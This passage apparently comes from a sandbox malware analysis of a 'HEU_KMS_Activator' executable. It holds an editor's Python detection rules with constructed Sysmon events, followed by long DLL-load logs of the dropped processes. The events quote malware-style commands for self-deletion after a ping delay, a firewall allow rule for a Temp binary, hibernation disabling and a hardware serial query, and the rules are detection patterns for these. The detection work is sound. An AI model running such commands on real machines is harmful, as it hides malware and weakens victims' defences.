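The process tree above carries the behaviours the signature list flags: a ping-to-loopback followed by del as a sleep-then-self-delete, a netsh allow rule whose program= points into a user's Temp folder, powercfg /h off, a wmic BaseBoard serial lookup, an -install switch on a binary under LOCALAPPDATA, and executables started from C:\Windows\_temp... and from System32\drivers. The Python below is an editor's added example, not part of the Joe Sandbox report and not a vendor rule set; it encodes each of those observations as a command-line rule and runs them over SAMPLE_EVENTS, a constructed Sysmon Event ID 1 style set of process-creation records modelled on the lines above. The rule names and the benign netsh control record are the editor's own.

```python
import re

# Constructed Sysmon Event ID 1 style records modelled on the process tree in
# this report; illustrative, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c ping -n 3 127.1 >nul & del /q C:\Users\user~1\AppData\Local\Temp\_J8156NOVDEC.exe'},
    {"Image": r"C:\Windows\SysWOW64\netsh.exe",
     "CommandLine": r'netsh advfirewall firewall add rule name="HEU_KMS_Activator" dir=in action=allow profile=any program="C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe"'},
    {"Image": r"C:\Windows\SysWOW64\powercfg.exe", "CommandLine": r"powercfg /h off"},
    {"Image": r"C:\Windows\SysWOW64\wbem\WMIC.exe", "CommandLine": r"wmic BaseBoard get SerialNumber"},
    {"Image": r"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe" -install'},
    {"Image": r"C:\Windows\_temp07242019502489\7Z.EXE",
     "CommandLine": r"C:\Windows\_temp07242019502489\7Z.EXE x C:\Windows\_temp07242019502489\KMSmini.7z -y -oC:\Windows\_temp07242019502489"},
    {"Image": r"C:\Windows\System32\drivers\DvLayout.exe",
     "CommandLine": r'"C:\Windows\SysNative\drivers\DvLayout.exe" 200156 Helicarrier wccenter.exe wrme.exe wuhost.exe wdlogin.exe LSI_SAS2l iaLPSS1z "CSIDL_LOCAL_APPDATA&Microsoft\Event Viewer" Hook'},
    # Benign control (constructed): merely listing firewall rules must not fire.
    {"Image": r"C:\Windows\System32\netsh.exe", "CommandLine": r"netsh advfirewall firewall show rule name=all"},
]

# (rule name, regex on Image, regexes that must ALL match CommandLine); all case-insensitive.
RULES = [
    ("ping_sleep_then_self_delete", r"\\cmd\.exe$",
     [r"\bping(\.exe)?\s+(-n\s+\d+\s+)?(127\.0\.0\.1|127\.1|localhost)\b",
      r"\bdel\s+(/[a-z]\s+)*\S+\.exe\b"]),
    ("firewall_allow_for_user_writable_path", r"\\netsh\.exe$",
     [r"\badvfirewall\s+firewall\s+add\s+rule\b", r"\baction=allow\b",
      r'program="?[^"]*\\(appdata|temp|users\\public|programdata)\\']),
    ("hibernation_disabled", r"\\powercfg\.exe$", [r"(^|\s)[/-]h(ibernate)?\s+off\b"]),
    ("hardware_serial_query", r"\\wmic\.exe$",
     [r"\b(baseboard|bios|csproduct)\s+get\s+(serialnumber|uuid)\b"]),
    ("install_switch_from_user_profile", r"\\appdata\\", [r"(^|\s)[-/]install\b"]),
    # .exe launched from a C:\Windows subfolder that is not one of the normal system dirs
    ("exe_run_from_windows_subdir",
     r"^c:\\windows\\(?!(system32|syswow64|winsxs|microsoft\.net|servicing)\\)(?:[^\\]+\\)+[^\\]+\.exe$", []),
    # the drivers folder is expected to hold .sys files, not executables
    ("exe_in_drivers_dir", r"\\system32\\drivers\\[^\\]+\.exe$", []),
]


def evaluate(event):
    """Return the names of every rule that fires on one process-creation record."""
    hits = []
    for name, image_re, cmd_res in RULES:
        if not re.search(image_re, event["Image"], re.I):
            continue
        if all(re.search(p, event["CommandLine"], re.I) for p in cmd_res):
            hits.append(name)
    return hits


def scan(events):
    """Map each rule name to the command lines that triggered it."""
    report = {}
    for ev in events:
        for name in evaluate(ev):
            report.setdefault(name, []).append(ev["CommandLine"])
    return report


if __name__ == "__main__":
    for name, lines in scan(SAMPLE_EVENTS).items():
        print(f"[{name}]")
        for line in lines:
            print("   ", line)
```

Each rule gates on the Image basename first and only then requires every command-line pattern, which is why the control record (netsh ... show rule) stays silent. The firewall rule deliberately narrows to program= paths under user-writable directories: a legitimate installer adding a rule for a binary under Program Files should not trip it, while a rule for an executable in Temp, as seen here, should.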
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: npmproxy.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: netprofm.dll (loaded 10 further times, each time paired with npmproxy.dll)
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe | Section loaded: npmproxy.dll (loaded 10 further times, each time paired with netprofm.dll)
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: sxs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msiso.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: mlang.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\drivers\DvLayout.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostservice.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: networkhelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdataplatformhelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: syncutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccspal.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vaultcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcfgutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmcmnutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dmxmlhelputils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: inproclogger.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: synccontroller.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pimstore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: aphostclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: accountaccessor.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: systemeventsbrokerclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatalanguageutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mccsengineshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cemapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userdatatypehelperutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: phoneutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\powercfg.exe | Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: netprofm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: npmproxy.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
